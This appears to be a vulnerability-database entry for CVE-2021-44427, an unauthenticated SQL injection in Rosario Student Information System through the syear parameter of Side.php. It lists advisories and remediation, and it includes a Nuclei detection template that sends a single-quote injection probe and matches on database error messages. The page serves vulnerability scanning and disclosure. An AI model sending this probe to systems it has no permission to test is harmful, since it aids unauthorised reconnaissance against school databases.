Rosario Student Information System Unauthenticated SQL Injection

🗓️ 31 May 2026 03:02:53Reported by ProjectDiscoveryType

Rosario Student Information System Unauthenticated SQL Injection vulnerability allowing remote attackers to execute PostgreSQL statements via syear parameter on Side.ph

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2021-44427	30 Nov 202100:33	–	circl
CNNVD	Rosario Student Information System SQL注入漏洞	29 Nov 202100:00	–	cnnvd
CNVD	Rosario Student Information System SQL Injection Vulnerability	1 Dec 202100:00	–	cnvd
CVE	CVE-2021-44427	29 Nov 202121:34	–	cve
Cvelist	CVE-2021-44427	29 Nov 202121:34	–	cvelist
Github Security Blog	SQL Injection in rosariosis	2 Dec 202117:48	–	github
NVD	CVE-2021-44427	29 Nov 202122:15	–	nvd
OSV	GHSA-WF5P-F5XR-C4JJ SQL Injection in rosariosis	2 Dec 202117:48	–	osv
Prion	Sql injection	29 Nov 202122:15	–	prion
RedhatCVE	CVE-2021-44427	6 Feb 202503:26	–	redhatcve

Source	Link
gitlab	www.gitlab.com/francoisjacquet/rosariosis/-/issues/328
twitter	www.twitter.com/RemotelyAlerts/status/1465697928178122775
nvd	www.nvd.nist.gov/vuln/detail/CVE-2021-44427
github	www.github.com/ARPSyndicate/cvemon
github	www.github.com/ARPSyndicate/kenzer-templates

id: CVE-2021-44427

info:
  name: Rosario Student Information System Unauthenticated SQL Injection
  author: furkansayim,xShuden
  severity: critical
  description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database, modify data, or execute arbitrary SQL commands.
  remediation: Upgrade to version 8.1.1 or higher.
  reference:
    - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
    - https://twitter.com/RemotelyAlerts/status/1465697928178122775
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44427
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-44427
    cwe-id: CWE-89
    epss-score: 0.88416
    epss-percentile: 0.99516
    cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rosariosis
    product: rosariosis
  tags: cve,cve2021,sqli,rosariosis,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/Side.php"

    body: "sidefunc=update&syear=111'"

    headers:
      Content-Type: application/x-www-form-urlencoded; charset=utf-8

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB Execute Failed. ERROR:"
          - "unterminated quoted string"
        condition: and

      - type: word
        part: header
        words:
          - "RosarioSIS="

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210095c6c64e35a21b9f981d1558356f80ccff162b6a6ca05bb18aad6d13bbd7e04302210087d7ea88bfc71690bd5c9e06d5b9d9196a86e890a76d853754c614b526713fcf:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

7.5High risk

Vulners AI Score7.5

CVSS 27.5

CVSS 3.19.8

EPSS0.88416